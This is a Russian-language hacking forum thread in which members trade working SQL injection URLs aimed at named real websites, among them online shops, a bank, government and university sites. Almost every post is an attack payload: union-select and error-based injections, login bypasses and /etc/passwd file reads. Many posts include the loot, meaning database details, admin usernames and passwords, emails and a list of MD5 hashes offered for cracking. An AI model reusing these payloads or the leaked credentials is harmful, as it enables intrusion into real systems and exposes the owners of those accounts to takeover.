http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=39+and+ascii(lower(substring(version(), 1,1)))=0x35
MySQL 5.x

http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=-1+union+select+1/*
Улыбнуло =)

Пользователь:

http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=39+and+user()=char(0x75,0x6e,0x69,0x78, 0x64,0x6f,0x63,0x40,0x6c,0x6f,0x63,0x61,0x6c,0x68, 0x6f,0x73,0x74)

unixdoc@localhost

http://www.citroen-forum.nl/markt/advertentie.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x20 3a20,username,user_password,user_email),12,13,14,1 5,16,17+from+citroen_users+limit+0,50/*
6.8k акков

mssql:
http://shop.nag.ru/core.asp?main=catalog&act=page&id=1034+or+1=@@version--
table:
__STITLES
Accounts
Action_Transition
ActionOnTransitions
Admins
Advert
afftypes
agent
AllowedStatus
AllowedTransitions
AlternativeProducts
Banlog
Banner
BannerLocations
banners
BizRateCategories
BizRateRules
BizRateTemplates
BLP
BP
BundleItems
BundleItemsView
BundleProductIDs
Bundles
campaign
Cards
Categories
CategoryMap
clicks
ClicksReportTemp
Contacts
Countries
Departments
Discounts
dtproperties
Feedback
FeedUploads
GroupDiscounts
Groups
ImageTypes
Import
impress
Invoice
ItemState
Links
MailBlackList
MailBroadcastResults
MailBroadcasts
MailDictionary
MailExtractors
MailListEmails
MailLists
MailTemplates
ManualChanges
ManuallyChangedValues
MemberDiscounts
MemberGroups
Members
MemberTransactions
MenuItems
Messages
ModelDocument
OrderDiscounts
OrderLines
OrderLog
Orders
OrderStatus
OrderStatuses
OrderTypes
OrdStatusHistory
Page
PageLog
PagePerms
Pages
params
PaymentActions
payments
PermisionMenu
PlatformCategories
Platforms
Priority
ProductCategories
ProductImages
ProductItems
ProductPlatforms
Products
ProductsTitles
Publishers
QualityDeductions
QualitySettings
QuantityDeductions
QuantitySettings
Ratings
Reasons
RelatedProducts
ReportsTemp
SearchQuery
Sections
Settings
Shipping
ShippingClasses
ShippingMethods
ShippingRates
Shopcart
ShopcartDiscounts
ShopcartRequirements
SiteCMS
SiteTemplates
States
StatusHistory
Substitutions
SupplyRequest
sysconstraints
syssegments
Tasks
TitlesCategoriesPlatforms
TradeInRequirements
Vendors
WaitList
WordIndex
XLSImport
mysql(агрохимбанк):
http://www.axbank.ru/library/comments.html?id=-1)+sql
table:
_a_event
_a_finance
_a_history
_a_license
_a_management
_a_mission
_a_response
_a_struct
_about
_action_g
_c_cards
_c_cassa
_c_consult
_c_converse
_c_credit
_c_deposit
_c_econom
_c_fact
_c_inkass
_c_paper
_c_safe
_c_super
_c_system
_c_uprav
_corporate
_cr_m_credit
_cr_s_credit
_cr_scheta
_cred
_exchanges
_f_cards
_f_change
_f_credit
_f_inet
_f_paper
_f_paper_b
_f_paper_d
_f_perevod
_f_perevod_c
_f_perevod_e
_f_perevod_w
_f_privat
_f_safe
_f_text
_f_vklad
_fiz
_k_forvard
_k_org
_k_quality
_k_text
_klientz
_l_acts
_l_books
_l_comments
_l_img
_l_publics
_l_types
_l_video
_library
_m_action
_m_action_text
_m_dirs
_m_prav
_m_revision
_open_support
_p_announce
_p_faq
_p_news
_p_quest
_p_release
_p_report
_p_themes
_paper_b
_paper_d
_press
_rec
_s_filials
_s_otdel
_s_sales
_s_vacancy
_s_vacancy_text
_t_tarif
_t_types
_tablesTree
_tarifs
_v_sroks
_v_types
_vacancy
bdict
categories
crossdict
dict
dict00
dict01
dict02
dict03
dict04
dict05
dict06
dict07
dict08
dict09
dict0A
dict0B
dict0C
dict0D
dict0E
dict0F
dict10
dict11
dict12
dict13
dict14
dict15
dict16
dict17
dict18
dict19
dict1A
dict1B
dict1C
dict1D
dict1E
dict1F
dict20
dict21
dict22
dict23
dict24
dict25
dict26
dict27
dict28
dict29
dict2A
dict2B
dict2C
dict2D
dict2E
dict2F
dict30
dict31
dict32
dict33
dict34
dict35
dict36
dict37
pict38
dict39
dict3A
dict3B
dict3C
dict3D
dict3E
dict3F
dict40
dict41
dict42
dict43
dict44
dict45
dict46
dict47
dict48
dict49
dict4A
dict4B
dict4C
dict4D
dict4E
dict4F
dict50
dict51
dict52
dict53
dict54
dict55
dict56
dict57
dict58
dict59
dict5A
dict5B
dict5C
dict5D
dict5E
dict5F
dict60
dict61
dict62
dict63
dict64
dict65
dict66
dict67
dict68
dict69
dict6A
dict6B
dict6C
dict6D
dict6E
dict6F
dict70
dict71
dict72
dict73
dict74
dict75
dict76
dict77
dict78
dict79
dict7A
dict7B
dict7C
dict7D
dict7E
dict7F
dict80
dict81
dict82
dict83
dict84
dict85
dict86
dict87
dict88
dict89
dict8A
dict8B
dict8C
dict8D
dict8E
dict8F
dict90
dict91
dict92
dict93
dict94
dict95
dict96
dict97
dict98
dict99
dict9A
dict9B
dict9C
dict9D
dict9E
dict9F
dictA0
dictA1
dictA2
dictA3
dictA4
dictA5
dictA6
dictA7
dictA8
dictA9
dictAA
dictAB
dictAC
dictAD
dictAE
dictAF
dictB0
dictB1
dictB2
dictB3
dictB4
dictB5
dictB6
dictB7
dictB8
dictB9
dictBA
dictBB
dictBC
dictBD
dictBE
dictBF
dictC0
dictC1
dictC2
dictC3
dictC4
dictC5
dictC6
dictC7
dictC8
dictC9
dictCA
dictCB
dictCC
dictCD
dictCE
dictCF
dictD0
dictD1
dictD2
dictD3
dictD4
dictD5
dictD6
dictD7
dictD8
dictD9
dictDA
dictDB
dictDC
dictDD
dictDE
dictDF
dictE0
dictE1
dictE2
dictE3
dictE4
dictE5
dictE6
dictE7
dictE8
dictE9
dictEA
dictEB
dictEC
dictED
dictEE
dictEF
dictF0
dictF1
dictF2
dictF3
dictF4
dictF5
dictF6
dictF7
dictF8
dictF9
dictFA
dictFB
dictFC
dictFD
dictFE
dictFF
links
qcache
qinfo
qtrack
server
srvinfo
url
urlinfo
wrdstat
ещё один шоп:
http://shop.rosastro.ru/starlist.php?sozv=2&select=-1'+union+select+1,2,3,concat(user,0x3a,password),5 ,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user/*
root:
admin:42cf
говру:
http://ntc.duma.gov.ru/bpa/docview.phtml?bpaid=1&t=T&code=-1+union+select+concat(user,0x3a,password)+from+mys ql.user/*
http://pravo.tambov.gov.ru/soft_na/bpa/docview.phtml?bpaid=2&code=-1+union+select+concat(user,0x3a,password)+from+mys ql.user/*
без коментариев)
http://shop.nastolki.ru/item.php?id=234','lala','=)))','<?php include($page)?>','tyc','tyc','tyc')/*
желтая пресса:
http://old.zhizn.ru/comment.php?link=stars&id=-1+union+select+concat(0x3d,user(),version(),databa se()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*&page=2&per_page=3
би-два:
http://www.bdva.ru/funclub_details.phtml?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+information_schema.tables+where+table_name+not+ in+('phpbb_config','phpbb_topics','COLLATIONS','CO LLATION','CHARACTER_SET','APPLICABILITY','COLUMNS' ,'COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES' ,'SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS','TABL ES','TABLE_CONSTRAINTS','TABLE_PRIVILEGES','COLLAT ION_CHARACTER_SET_APPLICABILITY','TRIGGERS','PROFI LING','USER_PRIVILEGES','VIEWS','CHARACTER_SETS',' arhiv_tbl','biologia_tbl','banner_tbl','credits_tb l','country_tbl','creviews_tbl','chtivo_tbl','disk _tbl','faces_tbl','diary_tbl','fanclub_tbl','faq_a nswers_tbl','fanclub_activity_tbl','faq_questions_ tbl','filmographia_tbl','forum_topic_tbl','forum_a uthors_tbl','grafik_tbl','golos_tbl','friends_tbl' ,'guest_authors_tbl','guest_comments_tbl','guest_o nline_tbl','handmade_index_tbl','guest_topic_tbl', 'handmade_tbl','history_tbl','hotnews_tbl','hudoze stva_index_tbl','hudozestva_tbl','indexnews_tbl',' humor_tbl','links_tbl','konkurs_tbl','nevorob_tbl' ,'oboi_index_tbl','oboi_tbl','photoalbum_index_tbl ','photoalbum_tbl','premeri_tbl','probap_tbl','rad io_log','radio_users','raznoe_tbl','reviews_tbl',' shop_tbl','sideaccords_tbl','sides_tbl','sidedisk_ tbl','sidesong_text_tbl','sidetracks_tbl','song_te xt_tbl','tour_tbl','tracks_tbl','version_tbl','uno ff_tbl','vfocuse_index_tbl','vfocuse_tbl','videohr onika_tbl','accords_tbl','phpbb_auth_access','phpb b_banlist','phpbb_confirm','phpbb_disallow','phpbb _forum_prune','phpbb_forums','phpbb_posts','phpbb_ groups','phpbb_posts_text','phpbb_privmsgs','phpbb _privmsgs_text','phpbb_ranks','phpbb_search_result s','phpbb_search_wordlist','phpbb_search_wordmatch ','phpbb_sessions','phpbb_sessions_keys','phpbb_sm ilies','phpbb_themes','phpbb_themes_name','phpbb_t opics_watch','phpbb_user_group','phpbb_users','php bb_vote_desc','phpbb_vote_results','phpbb_vote_vot ers','phpbb_words','phpbb_categories')/*
мобила:
http://www.mobila.com.ua/news.php?razdel=999+union+select+1,2,3/*
хостинг1:
http://web.privat-online.net/news.php?id=-1'+union+select+1,table_name,3,4,5+from+informatio n_schema.tables+where+table_name+not+in+('COLLATIO NS','COLLATION','CHARACTER_SET','APPLICABILITY','C OLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','RO UTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS ','TABLES','TABLE_CONSTRAINTS','TABLE_PRIVILEGES', 'COLLATION_CHARACTER_SET_APPLICABILITY','TRIGGERS' ,'PROFILING','USER_PRIVILEGES','VIEWS','CHARACTER_ SETS','articles','newsrus','dbusers','newsukr','we bnews')/*
хостинг2:
http://www.realsweb.com/news.php?item=-1+union+select+1,2,3,table_name,5,6+from+informati on_schema.tables+where+table_name+not+in+(0x434f4c 4c4154494f4e53,0x434f4c4c4154494f4e5f4348415241435 445525f5345545f4150504c49434142494c495459,0x434f4c 554d4e53,0x434f4c554d4e5f50524956494c45474553,0x4b 45595f434f4c554d4e5f5553414745,0x50524f46494c494e4 7,0x524f5554494e4553,0x534348454d415441,0x53434845 4d415f50524956494c45474553,0x53544154495354494353, 0x5441424c4553,0x5441424c455f434f4e53545241494e545 3,0x5441424c455f50524956494c45474553,0x54524947474 55253,0x555345525f50524956494c45474553,0x564945575 3,0x4348415241435445525f53455453)/*

http://www.ghdhair.com/go/shop-uk/product_info.php?products_id=-1+union+select+VERSION()/*

http://www.turkuaz.us/content.php?magId=-34+union+select+1,2,3,4,VERSION(),6,7/*

http://right-web.net/right-host/rus/news.shtml?id=-45+union+select+1,2,3,4,5,6,7+from+users/*

http://berloga.net/?c=-1+union+select+1,2,3,4,5,VERSION(),7,8,9,10,11,12, 13/*

http://www.fsi.cbi.uni-erlangen.de/userinfo.php?id=-14+union+select+1,2,convert(concat_ws(0x3a,name,pa ssword,email)+using+latin1)+from+fscbi_user/*
Решил найти админку обратился http://www.fsi.cbi.uni-erlangen.de/admin.php
Мне любезно сообщили что такой нет и предложили верный путь
http://www.fachschaft.cbi.uni-erlangen.de/admin/login.php
Ну что за чудаки =)) Попробывал залогинится дедовским методом 1' or 1=1/*
Получил отказище, но зато узнал где лог
http://www.fsi.cbi.uni-erlangen.de/userinfo.php?id=-14+union+select+1,2,convert(concat_ws(0x3a,action, time,userid,type)+using+latin1)+from+fscbi_log/*
Вообщем ничего особенного, но забавно

http://www.zonewm.biz/showasf.php?id=-4+union+select+1,2,3,id,5,pass,7,8,9+from+user/*

http://bin.ru/office_location.php?office_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,AE S_DECRYPT(AES_ENCRYPT(DATABASE(),%20%200x71),0x71) ,16,17,18,19/*
Помогите подобрать таблицы!!!
+ еще мс етой инъекцией
http://www.metalloprokat.ru/onlinechat/?template=-1+union+select+1,2,3,4,5,6,7,8,9/*

http://web.northshield.org/events/calentry.php?ID=-301+union+select+1,2,concat_ws(0x203a20,username,p assword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28+from+users/*

http://www.beststroy.ru/articles_cat.php?id=-2+union+select+1,version()/*
http://www.beznakrutki.ru/navigator.php?katalogid=3&rasdel=-3+union+select+1,database(),version(),4,5/*
вторая - онлайн шоп

Обновил Антибоян до 260 страницы, юзаем
http://antiboyansql.narod.ru/sql.txt

Спасибо geezer.code и Boccob

Интернет-магазин цифровой и портативной техники.
http://www.texnostar.com.ua/a-news/news.php?id=-19456+union+select+1,2,3,4,5,6,7,8,9,10/*&groupid=0
USER: texnosta_texno@localhost
DATABASE: texnosta_texno
VERSION: 4.1.21-standard-log


Тоже инет-магазин.
http://te.com.ua/catalog.php?cat=-156878+union+select+1,2,3,4,5,6,7,8/*
USER: u_te@localhost
DATABASE: te
VERSION: 4.1.22-standard


Магазин подарков "Luxury Gifts".
http://www.l-gifts.ru/view_catalog.php?type_low=-12345+union+select+1,2/*
USER: vittorio@pm18.zenon.net
DATABASE: vittorio
VERSION: 4.0.24-log


БЕЛЭКСПОЦЕНТР Белгородская торгово-промышленная палата.
http://www.belexpocentr.ru/show.php?id=-12345+union+select+1,2,3,4,5,6,7,table_name,9,10,1 1,12,13,14,15,16,17,18,19,20,21+from+INFORMATION_S CHEMA.TABLES+limit+0,1/*
USER: belexpocentr@localhost
DATABASE: www_belexpocentr_ru
VERSION: 5.0.42


GiperShop Интернет-магазин Запорожье - Украина.
http://mobila.gipershop.net.ua/descript.php?kodmob=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11/*
USER: gipersho_guest@localhost
DATABASE: gipersho_mob
VERSION: 4.1.22-standard


Белгрейн. Отделочные и строительные материалы.
http://www.belgrein.biz/product.php?product=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22/*
USER: belgrein_zvonok@localhost
DATABASE: belgrein_belgreinnew
VERSION: 4.0.27-standard


Национальный центр экспертизы лекарственных средств Республики Казахстан.
http://www.dari.kz/index.php?p=news_a&cat_id=&id=-12345+union+select+1,2,3,4,table_name,6,7,8,9,10,1 1+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*
USER: dariadm@localhost
DATABASE: dari
VERSION: 5.0.27


Национальный Информационный Сервис PULSET.
http://www.pulset.ru/a_news.php?id_n=-12345+union+select+1,2,3,4/*&type_n=&act=this
USER: mediabro@lex.rbc.ru
DATABASE: wwwmediabrokerru
VERSION: 4.1.18

[Цензура]

Grey: На будующее, таких фраз лучше избегать, этот форум не посвящен политики.

------------------------------------------------------

http://www.siin.ee/bestdesign/?keel=rus&mid=0&include=news_viewer&nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

Помогите - подобрать - таблицы!

Ошибка в fоrex

__http://www.liteforex.net/litetext.php?liteid=-1+union+select+1,2,3,4,password,6,7,8,9,10,11,12,1 3,14,15,16,17+from+mysql.user/*


__http://www.liteforex.net/litetext.php?liteid=-1+union+select+1,2,3,4,concat(user_id,0x3a,usernam e,0x3a,user_password,0x3a,user_email,0x3a,user_icq ),6,7,8,9,10,11,12,13,14,15,16,17+from+phpbb_users +where+user_id=2/*

cocacola.ru
http://cocacola.ru/promo/antidacha/story.php?id=1+union+select+1,DATABASE(),3,4,USER( ),VERSION(),7,8,9/*
таблицы подбирать было лень

Разработка сайтов "С-Дизайн", создание сайтов, хостинг, регистрация доменных имен (CMS разработана ими => ошибка во всех сданых проэктах)
_http://sdesign.com.ua/search.html?s=-1+union+select+1,2,3,4,version(),6/*

Content.com.ua - интернет журнал для владельцев корпоративных веб-сайтов
_http://www.content.com.ua/print?idsource=99999+union+select+1,2,version(),4, 5,6,7,8,9,0,1,2/*

НАШЕ Радио, найближча станція
_http://www.nashe.ua/news2.php?id=2349'+union+select+1,version(),3,4,5, 6,7,8,9,0,1,2/*

Продажа квартир Киев, аренда офисов Киев, недвижимость Украины, новостройки, агентства недвижимости
_http://tv.realtors.com.ua/index.php?channel=2000+union+select+1,version(),3, 4+from+users/*

Телевізійний проект "Шанс", канал "Інтер"
_http://www.shans-ua.com/?Id=1&pg1=1&pg2=1&nId=566+union+select+1,2,3,4,5,6,7,concat(login,ch ar(58),password),9+from+users+limit+0,1/*
=========================
ну и на сладкое один из крупнейших инет магазинов Украины.
Интернет-магазин бытовой техники, сотовых телефонов, компьютеров и компьютерной техники, Украина - Matrix, Лауреат в номинации "Лучший интернет-магазин"
_http://www.matrix.ua/polls/?poll_id=2444+union+select+1,TABLE_NAME,3,4,5+from +INFORMATION_SCHEMA.TABLES+limit+61,1/*

сайт www.wapro.ru посвящен WAP-у. PR-4. MySQL-5.

chatamobile.user
http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(login,char(58),password),3 ,4,5,6,7,8,9,10+from+chatamobile.user/*
mail.users
http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(domain,char(58),password), 3,4,5,6,7,8,9,10+from+mail.users/*
mysql.user
http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(User,char(58),Password),3, 4,5,6,7,8,9,10+from+mysql.user/*
foruma.fora_users
http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(user_icq,char(58),user_pas sword),3,4,5,6,7,8,9,10+from+foruma.fora_users/*
база давольно неплохая, вот админ
Admin:24ae2f800daf6a117841c5c61be67a67

дальше изучая базу я отобрал довольно красивые аськи(хочу заметить что пароли для входа на форум и могут и не подойти для уинов, но надежда, как говориться, умирает последней(как показывает практика, большенство юзеров используют один, относительно сложный пароль для всего)), надеюсь комуто из вас повезет в расшифровке MD5
442200:10ebf2d1e312389e3b8baca29f1fd421
23323332:95dc8fc16dc55e9d4902eaa0861638a5
423423:d9a40cfb1692dfd49829d109a8af86a5
27539:3bae43f4cfc7acd1a699e996ef3fac5b
345671:98c6838c94fe120d3082c8d5f4f413c9
984654:246889492fc07811d7582fd536b7d68c
987645:24e8ce64f14321a98dcab7ee41dfe9bc
987546:7cfbd7dbadb4f24607832821f7b303d6
885021:546af3c7c8b162b99963a6c62447a59d
568548:7f402a42733eff76f00c5bd6394621ed
1000001:d74c12c77e8259492f8003136a5c26ba
87964:2166428a87325ff398144b0d12cec45a
798613:d6e467f1f1f7839c5e03d51029faf393
787878:042bf3b0246f1bcdcf55c73e9a110e24
569874:a219b873b8172963ce021112159df72a
9955668:2ebb18ec08da2ac6c22f80a3205af3e8
132453:f50b911ff609c703baab2a8f2b085203
144442:0d1812f0d53bac5ff80fef2b9a41349d
987564:f5ccdca1979f823c8faae9abd5e9130e
104134:1fdb82c37295e1c087578c07f3ff6e46
243342:c64e0cf9ce260990d6472f3c333266dc
342295:c6872161c52f9620f887974469f32ada
535355:cde5c8d0c68fb39fdd9538d2e322d9a3
101444:a5e79e5498ff07ed2d6a583c37c8d829
293694:bd1ed02d8e1bb36a6c93a1247e02a0a7
548782:04bfb286a0a8c56153e62103f4cd44bf
846541:2ed4f8f98582f2d52f73bf578e96b82d
798755:a90371d82212679dbb6943dd6587f825
984679:c37b9bc2bf1579e8136ddad7bfcfbfdc
452356:c8443dcc4bad7c2ecd683cac9362ba09
3434899:a36ed3236641bff0aed700898285e881
821170:45f65bf28237101d4f810d9492789216
737084:bc3070228848d8cceabf3510bb254b7f
324876:5c5807bab80a0dee4bb43821db1dbe1f

http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6/*

udb3478:Uwww3478S@localhost:4.0.26

http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(username,char(58),us er_password),6+from+phpbb_users+limit+1,1/*

Past:fedfd9eb856714f7e503036b451b9305:::8854051

http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(username,char(58),us er_password),6+from+phpbb_users+where+username=cha r(122,117,98,105,108,111)/*

zubilo:2011fed5a93acfe8f9014bd5ebb3afed:::vfqrfg

http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(username,char(58),us er_password),6+from+phpbb_users+where+username=cha r(69,68,68,89)/*

EDDY:67a0f0a3c1b6fbd6c4b4997bce86a5ed:::421680

cocacola.ru
http://cocacola.ru/promo/antidacha/story.php?id=1+union+select+1,DATABASE(),3,4,USER( ),VERSION(),7,8,9/*
таблицы подбирать было лень
Таблица users
http://cocacola.ru/promo/antidacha/story.php?id=1+union+select+1,2,3,4,5,concat(name, 0x3a,password,0x3a,email),7,8,9+from+users+where+i d=1/*
Правда всего одна запись - админ ;)
admin:7b21848ac9af35be0ddb2d6b9fc3851934db8420:inf o@rg.by

http://links.allprikol.ru/links.php?id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(na me,char(58),password),0x78),0x78),3+from+admin/*
пассы админов в открытом виде, но админки найти не смог, кто найдет поставлю +5
fishkafix:lorddark13
DtSc:ldoprhhk

_______

http://www.trubka.ru/cellular/links_s.php?id=-2+union+select+1,concat(login,char(58),password),3 ,4+from+admin/*

http://www.fibl.org/english/mail.php?id=-7+union+select+1,VERSION(),3/*

http://agtw.abime.net/game.php?id=-7+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13+from+INFORMATION_SCHEMA.TABLES+limit+26,1/*

http://www.wap.pfl.com.ua/game.php?id=-12151++union+select+1,2,3,4,5,6,VERSION(),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

http://www.study.ee/gallery/index.php?action=showgal&cat=-15+union+select+1,2,3,4,5,6,7,version(),9,10,11,12 ,13,14,15/*
Резултат смотрим в исходнике
Downloads: 11
Added: 01.01.70
(4.0.24-standard-log bytes)" title="Views: 6
Downloads: 11
Added: 01.01.70

2 _Pantera_

ну вот тут ессть админка http://admin.allprikol.ru/
пассы подходят

http://www.bantjes.com/index.php?id=-150+union+select+concat(user(),version(),database( ))/*

http://www.tennisnews.com/
PR-5
http://www.tennisnews.com/exclusive.php?pID=20630'+union+select+1,2,3,4,5,6, 71,8,9,0,1,2,3,4,5,6,72,8,9,0,1,2,3,4,5,6,concat_w s(0x3a,user(),version(),database()),8,9,0,1,2,3,4, 5,6,7,8,9/*найдены таблицы
partner (email,name,passwd,phone,pid) , subscriber

Так же работает читалка )) http://www.tennisnews.com/exclusive.php?pID=20630'+union+select+1,2,3,4,5,6, 71,8,9,0,1,2,3,4,5,6,72,8,9,0,1,2,3,4,5,6,load_fil e('/etc/passwd'),8,9,0,1,2,3,4,5,6,7,8,9/*
http://www.tennisnews.com/exclusive.php?pID=20630'+union+select+1,2,3,4,5,6, 71,8,9,0,1,2,3,4,5,6,72,8,9,0,1,2,3,4,5,6,load_fil e('/home4/tennisne/tennisnews-www/exclusive.php'),8,9,0,1,2,3,4,5,6,7,8,9/*

www.g-play.ru

Подозрение на инъекцию: http://www.g-play.ru/buycd.asp?code=1'
MSSQL

Узнаем версию: http://www.g-play.ru/buycd.asp?code=1%20or%201=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

Узнаем юзера: http://www.g-play.ru/buycd.asp?code=1%20or%201=(select%20system_user)--
g-play4

Узнаем имя базы: http://www.g-play.ru/buycd.asp?code=1%20or%201=(select%20db_name())--
g-play

Смотрим таблицы: http://www.g-play.ru/buycd.asp?code=1+or+1=(select+top+1+table_name+fro m+information_schema.tables)--
и т.д. В итоге:

T_Countrys_R
A_Category
A_HardReviews
A_Price
dtproperties
G_Вопросы
G_Закачки
G_Новости
G_Проекты
G_Сотрудники
G_Ссылки
G_ТемыВопросов
G_Услуги
sysconstraints
T_Anketa
T_BusinessDopOrel
T_BusinessMainOrel
T_BusinessTula
T_Countrys_I
T_Entries_GPLAY
T_Forums_GPLAY
T_Forums_Users
T_PersonalTula
T_PrivateOrel
T_Rate
T_Towns_I
T_Towns_R
Z_News
Z_Texts
Z_Uchastok
Т_Автор
Т_Афоризмы
Т_ЖанрИгры
Т_Игры
Т_Закачки
Т_Изготовитель
Т_Мнения
Т_Новости
Т_Описания
Т_Процессор
Т_Публикатор
Т_Разделы
Т_Скриншоты
Т_Ссылки
Т_СсылкиТел
Т_ЧитКоды

Заинтересовала таблица 'T_Forums_Users'. Смотрим столбцы.
http://www.g-play.ru/buycd.asp?code=1+or+1=(select+top+1+column_name+fr om+information_schema.columns+where+table_name='T_ Forums_Users')--
и т.д. В итоге:

userid
UserName
UserEMail
Location
Occupation
URL
Interests
ICQnum
Signature
ShowEMail
Password
ActiveUser
StorePassword
CloseUser

Итак, вот что мы имеем (а именно - администратора):
http://www.g-play.ru/buycd.asp?code=1+or+1=(select+top+1+cast(UserName+ as+nvarchar)%2B%27%3A%27%2Bcast(UserEMail+as+nvarc har)%2B%27%3A%27%2Bcast(ICQnum+as+nvarchar)%2B%27% 3A%27%2Bcast(Password+as+nvarchar)+from+T_Forums_U sers+where+userid=1)--

Ребят, хочется сдампить базу, помогите. Понимаю, что элементарно, только вот php только хотел начать изучать.. В пм если можно..

nvmu.ru

Подозрение на инъекцию:
http://nvmu.ru/cgi-bin/index.cgi?page=1'
Подбираем кол-во колонок:
http://nvmu.ru/cgi-bin/index.cgi?page=-1%20union%20select%201,2,3,4,5/*
Version: MySQL 5.1.19-beta
User: nvmu@localhost
Database: nvmu

Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться?

PS. Спасибо товарищу из аськи за наводку и заодно, что разбудил меня. =\

http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14/*
Хм.. Наверно там больше нет =\ Даже файлы прочитать не смог..

http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,3,4,5/*
эх найти бы таблицу юзеров

http://english.stanford.edu/ - PR 7


http://english.stanford.edu/?news_id=-88+union+select+1,user(),3,4,database(),version(), 7,TABLE_NAME+from+information_schema.tables/*

2злюка Код:
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,3,4,5/

эх найти бы таблицу юзеров tbl_userhttp://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,count(1),4,5+from+tbl_user/* 95167 записей http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5+from+tbl_user+limit+0,1/* admin:highstreet4013

админка
http://www.sportsguns.co.uk/login.php

-----------------------------------------------------------------

NOmeR1
http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14/*
Хм.. Наверно там больше нет =\ Даже файлы прочитать не смог..вот-сhttp://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,name,email,passw d),3,4,5,6,7,8,9,10,11,12,13,14+from+users+limit+0 ,1/* ROBERT JONASSON:BMF_RIPPER@HOTMAIL.COM:4TWCPP
можно залогиниться тут - http://www.arcteryx.nu/butiken/login.php - но хз что с этим делать, я по голандски не умею, надо Хиддинка спросить)

------------------------------------------------------------------------

iv.
Подбираем кол-во колонок: Цитата:http://nvmu.ru/cgi-bin/index.cgi?page=-1%20union%20select%201,2,3,4,5/* Version: MySQL 5.1.19-beta User: nvmu@localhost Database: nvmu Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться?
можно нормально вывести здесь http://nvmu.ru/cgi-bin/news.cgi?id=-bzU1UjCC'+union+select+1,2,table_name+from+informa tion_schema.tables+limit+35,1/* есть табличка members http://nvmu.ru/cgi-bin/news.cgi?id=-bzU1UjCC'+union+select+1,2,concat_ws(0x3a,login,pa ssword,email)+from+members+limit+0,1/* Borisov:3788:s_nahim@inbox.ru
еще примечательно, что можно авторизироваться просто введя ' or 1=1/* вместо логина плюс произвольный пароль :)

-----------------------------------------------------------------------
[PS] что-то везде пароли хранятся в открытом виде :)

http://www.qb4q.com/vacation.php?wid=-14+union+select+1,version(),3,4,5,6,7,8,9,0,11,12, 13,14
=\

http://www.worldteamtennis.com/
Офф сайт WTT(только чёт PR 4)

http://www.worldteamtennis.com/news/news_info.asp?news_id=-251+union+select+1,2,3,password,username,6,7,8,9+f rom+users

Одновременно username и password выводить не хочет. Надо по отдельности.

User: admin
Password: 2$$7#newsx
Админку не нашёл...


Вот ещё сайтец с доступом в user , то только выводить ничё не хочет...

http://www.yourmajesty.net/News_selec.asp?News_ID=-116+union+select+1,2,3,4,5,6,7,8+from+user

Spyder
Цитата:http://www.qb4q.com/vacation.php?wid=-14+union+select+1,version(),3,4,5,6,7,8,9,0,11,12, 13,14

=\
никак не смог подобрать колонку с пассом..\
а табличка мемберс:

http://www.qb4q.com/vacation.php?wid=-14+union+select+1,2,3,4,5,6,7,8,9,0,11,concat_ws(0 x3a,name,email),13,14+from+members/*

Вот ещё сайтец с доступом в user , то только выводить ничё не хочет...

http://www.yourmajesty.net/News_selec.asp?News_ID=-116+union+select+1,2,3,4,5,6,7,8+from+user

Это MSSQL. Это не правильный вывод и там нет User.

вношу свои =)
http://www.ji-association.org/news.phtml?id=-1+union+select+VERSION(),2,3,4,5,USER(),7,8,9,10+f rom+users/*
http://www.cosmopolitan.kz/content.php?idpart=3&idnum=-1+union+select+1,2,3,VERSION(),USER(),6,7,8/*
http://slt-tosol.ru/catalog.php?id=-1+union+select+1,VERSION(),USER(),4,5,6,7,8/*

Ещё 1:)
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,password,user,5+from+mysql.user/*

как мне и посоветовал iv буду развивть скули

